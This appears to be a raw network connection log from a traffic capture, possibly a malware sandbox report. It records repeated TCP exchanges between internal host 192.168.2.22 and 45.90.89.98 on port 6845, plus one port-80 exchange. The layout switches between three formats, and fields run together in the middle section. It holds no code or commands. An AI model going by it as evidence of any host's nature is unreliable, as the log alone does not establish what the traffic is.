Sep 30, 2024 16:24:40.265887022 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265893936 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.265924931 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.266271114 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.266745090 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.266756058 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.266767025 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.266777039 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.266788006 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.266788960 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.266808033 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.267510891 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267554998 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.267641068 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267904997 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267915964 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267926931 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267937899 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.267941952 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.267959118 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.270136118 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.279186964 CEST  80     49176  178.237.33.50  192.168.2.22
Sep 30, 2024 16:24:40.279238939 CEST  49176  80     192.168.2.22   178.237.33.50
Sep 30, 2024 16:24:40.345926046 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.345952034 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.345963955 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.345974922 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.345985889 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.345995903 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.345998049 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346034050 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346034050 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346251965 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346265078 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346275091 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346296072 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346339941 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346352100 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346365929 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346378088 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346399069 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346426010 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346472979 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.346509933 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.346549034 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347660065 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347677946 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347690105 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347697973 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.347701073 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347712994 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347723007 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347729921 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.347735882 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347748041 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.347759962 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.347776890 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.348222017 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.348359108 CEST  6845   49175  45.90.89.98    192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348368883 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348413944 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348447084 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348457098 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348470926 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348484039 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348536015 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348546982 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348557949 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348570108 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348589897 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348715067 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348800898 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348813057 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348838091 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348843098 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348855019 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348865032 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.348882914 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349457026 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349469900 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349481106 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349504948 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349518061 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349529982 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349541903 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349553108 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349559069 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349565983 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349591017 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349706888 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349719048 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349730015 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349750996 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349764109 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349788904 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349802017 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.349827051 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351092100 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351104975 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351115942 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351128101 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351138115 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351155996 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351288080 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351300955 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351310968 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351336956 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351353884 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351365089 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351375103 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351392031 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351406097 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351408958 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351428032 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351438046 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351454973 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351461887 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351466894 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351478100 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351480007 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.351510048 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.352015018 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354274035 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354382038 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354393005 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354403019 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354420900 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354432106 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354435921 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354443073 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354454994 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354460001 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354479074 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354480982 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354492903 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354502916 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354513884 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354521036 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354522943 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.354541063 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355178118 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355190992 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355201960 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355220079 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355236053 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355281115 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355294943 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355305910 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355315924 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355326891 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355334997 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.355364084 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.356514931 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434427977 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434453011 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434464931 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434475899 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434487104 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434499025 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434499025 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434509039 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434521914 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434549093 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434549093 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434549093 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.434581041 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484353065 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484354019 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484364033 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484374046 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484384060 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484400034 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484417915 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484502077 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484512091 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484523058 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484533072 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484544039 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484549046 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484554052 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484564066 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484570026 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484575033 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484580040 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484586000 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484608889 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484622955 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484659910 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.484941959 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523127079 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523143053 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523197889 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523220062 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523428917 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523441076 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523452044 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523463011 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523473024 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523475885 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523484945 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523499966 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523499966 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523511887 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523521900 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523535013 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523545027 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523555040 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523555040 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523564100 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.523586988 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588936090 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588957071 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588968039 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588979006 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588989973 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.588999987 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589011908 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589036942 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589037895 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589128971 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589139938 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589149952 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589159966 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589169979 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589175940 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589188099 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589200020 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589206934 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589241028 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589262009 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589273930 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589284897 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589294910 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589304924 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589314938 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589317083 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589338064 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589369059 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589374065 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589385986 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589396954 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589411974 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589421988 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589430094 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589432955 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589443922 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589451075 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589457035 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589471102 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589498043 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589528084 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589540005 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589549065 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589560032 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589570045 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589576006 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589580059 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589592934 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589600086 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589610100 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589622021 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589622021 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589632988 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589643002 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589653015 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589663029 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589673042 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589673996 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589673996 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589684963 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589704990 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589726925 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.589765072 CEST68454917545.90.89.98192.168.2.22
Sep 30, 2024 16:24:40.589776039 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589786053 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589796066 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589804888 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589816093 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589823961 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589823961 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589826107 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589839935 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589849949 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589852095 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589863062 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589879990 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589888096 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589890003 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589900970 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589909077 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
